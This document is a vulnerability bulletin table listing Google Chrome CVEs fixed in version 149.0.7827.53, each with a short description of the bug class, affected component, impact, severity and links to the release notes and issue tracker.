| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10911 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495819067 |
| Google--Chrome | Insufficient validation of untrusted input in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10912 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496614553 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10913 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497450927 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10914 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497574371 |
| Google--Chrome | Use after free in Core in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10915 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497612174 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10916 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497643690 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10917 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497929481 |
| Google--Chrome | Use after free in Viz in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10918 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498259721 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10919 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498872764 |
| Google--Chrome | Insufficient validation of untrusted input in WebShare in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10920 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498977444 |
| Google--Chrome | Integer overflow in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10921 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499159695 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to bypass same origin policy via malicious network traffic. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10922 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499164652 |
| Google--Chrome | Use after free in WebAppInstalls in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to execute arbitrary code via a malicious file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10923 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499423683 |
| Google--Chrome | Integer overflow in Chromecast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10924 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500055357 |
| Google--Chrome | Out of bounds write in Skia in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10925 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500071763 |
| Google--Chrome | Use after free in Cast in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to execute arbitrary code via malicious network traffic. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10926 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500075522 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10927 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500090141 |
| Google--Chrome | Script injection in Headless in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10928 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500124367 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10929 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500429259 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10930 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500472605 |
| Google--Chrome | Use after free in FileSystem in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10931 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501115599 |
| Google--Chrome | Use after free in UI in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10932 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501335606 |
| Google--Chrome | Use after free in Audio in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10933 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501557633 |
| Google--Chrome | Use after free in Autofill in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10934 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501594107 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10935 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501898683 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10936 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502439789 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10937 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502651056 |
| Google--Chrome | Inappropriate implementation in Input in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10938 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502681591 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10939 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503502607 |
| Google--Chrome | Race in Codecs in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10940 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503879873 |
| Google--Chrome | Out of bounds memory access in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10941 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503958940 |
| Google--Chrome | Inappropriate implementation in UI in Google Chrome on Windows prior to 149.0.7827.53 allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10942 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504104263 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10943 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504194151 |
| Google--Chrome | Insufficient policy enforcement in Autofill in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10944 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504215814 |
| Google--Chrome | Use after free in PDF in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10945 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504417768 |
| Google--Chrome | Heap buffer overflow in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10946 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504587797 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10947 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504597736 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10948 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504599749 |
| Google--Chrome | Heap buffer overflow in Video in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10949 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504644843 |
| Google--Chrome | Insufficient policy enforcement in Autofill in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10950 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505123022 |
| Google--Chrome | Use after free in Autofill in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10951 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505191883 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10952 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505231370 |
| Google--Chrome | Use after free in Core in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10953 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506147564 |
| Google--Chrome | Use after free in Actor in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10954 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506150628 |
| Google--Chrome | Type Confusion in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10955 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506374676 |
| Google--Chrome | Use after free in MimeHandlerView in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10956 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506375731 |
| Google--Chrome | Use after free in Glic in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10957 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506377279 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10958 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507251069 |
| Google--Chrome | Use after free in Input in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10959 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507258648 |
| Google--Chrome | Uninitialized Use in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10960 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507258786 |
| Google--Chrome | Use after free in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10961 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/508281950 |
| Google--Chrome | Type Confusion in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10962 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511006880 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10963 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511218177 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10964 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511228272 |
| Google--Chrome | Integer overflow in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10965 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511290038 |
| Google--Chrome | Inappropriate implementation in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10966 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511713779 |
| Google--Chrome | Use after free in SurfaceCapture in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10967 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511714900 |
| Google--Chrome | Insufficient validation of untrusted input in Dawn in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10968 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511758373 |
| Google--Chrome | Insufficient validation of untrusted input in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10969 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/511765713 |
| Google--Chrome | Insufficient validation of untrusted input in InterestGroups in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10970 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/512772489 |
| Google--Chrome | Insufficient validation of untrusted input in Printing in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10971 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513005991 |
| Google--Chrome | Use after free in Ozone in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10972 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513006660 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10973 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513042859 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10974 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513135862 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10975 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513154132 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10976 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513249847 |
| Google--Chrome | Uninitialized Use in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10977 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513340227 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10978 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513394258 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10979 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513468021 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10980 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513713927 |
| Google--Chrome | Insufficient validation of untrusted input in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted video file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10981 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513762354 |
| Google--Chrome | Use after free in WebXR in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10982 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513774197 |
| Google--Chrome | Insufficient validation of untrusted input in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10983 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513947609 |
| Google--Chrome | Inappropriate implementation in Accessibility in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10984 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/514022635 |
| Google--Chrome | Out of bounds read in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10985 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/514082801 |
| Google--Chrome | Integer overflow in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a malicious file. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10986 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/514744613 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10987 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/515431687 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10988 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/515465685 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-04 | not yet calculated | CVE-2026-10989 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/516311623 |
| Google--Chrome | Use after free in Glic in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10990 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506311914 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10991 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503553614 |
| Google--Chrome | Insufficient data validation in Animation in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10992 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493534964 |
| Google--Chrome | Heap buffer overflow in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10993 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504160794 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10994 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504820809 |
| Google--Chrome | Heap buffer overflow in TabStrip in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10995 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505371980 |
| Google--Chrome | Inappropriate implementation in Workers in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10996 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/40051700 |
